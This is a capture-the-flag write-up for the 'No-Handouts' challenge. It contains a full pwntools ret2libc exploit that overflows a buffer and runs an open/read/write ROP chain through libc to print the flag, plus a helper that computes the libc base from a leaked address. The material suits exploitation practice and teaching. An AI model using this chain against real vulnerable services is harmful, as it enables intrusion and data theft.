No-Handouts
Ret2Libc except no shell
We have a libc function leak (the address of system), as seen here. The challenge hints that there is no shell (/bin/sh does not work), so we will have to find an alternative way to read the flag.

We can accomplish this with the open, read and write calls, but first we need a way to get the string "flag.txt" into memory at an address we know.
Since we have no stack leak and PIE is enabled, we can write the string into libc's .bss section (whose address we know from the libc leak) and then pass that address as the pointer argument to open, read and write.
The exploit flow is:
1. Determine the cyclic offset needed to overwrite the saved return address (RIP).
2. Determine the libc base address from the leak.
3. Write the string "flag.txt\x00" into libc's .bss section (via gets).
4. Call libc's open, read and write with the right arguments to print the flag.
#!/usr/bin/env python3
from pwn import *

exe = ELF("./chall_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux-x86-64.so.2")
context.binary = exe

# Bytes of padding before the saved return address (found with cyclic()).
offset = 40


def conn():
    r = remote('challs.pwnoh.io', 13371)
    #r = process('./chall')

    # The service prints the address of system; parse it and derive the libc base.
    r.recvuntil(b"believe me? Try it yourself: it's at ")
    system_leak = int(r.recvline().strip(), 16)
    r.recvline()
    system_offset = libc.sym['system']
    libc.address = system_leak - system_offset
    assert libc.address + system_offset == system_leak

    # Writable, known address inside libc to hold "flag.txt\x00".
    libc_bss_address = libc.bss()

    payload = b'A' * offset
    rop = ROP(libc)  # type: ignore
    rop.gets(libc_bss_address)                 # read "flag.txt\x00" into .bss
    rop.open(libc_bss_address, 0)              # open("flag.txt", O_RDONLY)
    rop.read(3, libc_bss_address, 100)         # fd 3: first free descriptor after 0, 1, 2
    rop.write(1, libc_bss_address, 100)        # write the buffer to stdout
    payload += rop.chain()

    r.clean()
    r.sendline(payload)
    # Second line is consumed by gets() in the chain.
    r.sendline(b'flag.txt\x00')
    r.interactive()


def main():
    conn()


if __name__ == "__main__":
    main()
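The step the whole chain depends on is deriving the libc base from the leak; if the leak is parsed wrongly or the wrong libc build is used, every address in the chain is off. The following is an added example (not part of the original writeup and not using pwntools) that parses a leak line in the format the service prints, computes the base, and rejects a base that is not page aligned, which is the usual symptom of a mismatched libc or symbol. The leak line and the symbol offsets are constructed sample values; real offsets come from ELF("./libc.so.6").sym.

```python
import re

PAGE = 0x1000

# Constructed sample leak line in the format the challenge prints
# (not output captured from the real service).
SAMPLE_LEAK_LINE = b"Don't believe me? Try it yourself: it's at 0x7f3c2e1d1d70\n"

# Hypothetical symbol offsets for illustration only; in practice use
# ELF("./libc.so.6").sym["system"] and friends.
SAMPLE_SYMBOLS = {"system": 0x50D70, "gets": 0x80520, "open": 0x114690}


def parse_leak(line: bytes) -> int:
    """Extract the hex address that follows "it's at " on the leak line."""
    m = re.search(rb"it's at (0x[0-9a-fA-F]+)", line)
    if m is None:
        raise ValueError("no leak address found on line")
    return int(m.group(1), 16)


def libc_base(leak: int, symbol_offset: int) -> int:
    """Compute the libc load base from a leaked symbol address and that
    symbol's offset inside libc.so.6.

    A shared object is mmap'ed at a page-aligned address, so a base that is
    not a multiple of PAGE means the leak or the offset is wrong (typically a
    different libc build than the one the service runs).
    """
    base = leak - symbol_offset
    if base <= 0:
        raise ValueError("symbol offset is larger than the leaked address")
    if base % PAGE:
        raise ValueError(f"base {base:#x} is not page aligned; wrong libc or symbol?")
    return base


def resolve(base: int, symbols: dict, name: str) -> int:
    """Absolute address of a libc symbol given the computed base."""
    return base + symbols[name]


if __name__ == "__main__":
    leak = parse_leak(SAMPLE_LEAK_LINE)
    base = libc_base(leak, SAMPLE_SYMBOLS["system"])
    print(f"leak={leak:#x} base={base:#x} gets={resolve(base, SAMPLE_SYMBOLS, 'gets'):#x}")
```

The alignment check catches the most common failure (right leak, wrong libc) before any payload is sent, which is easier to debug than a crash on the remote side.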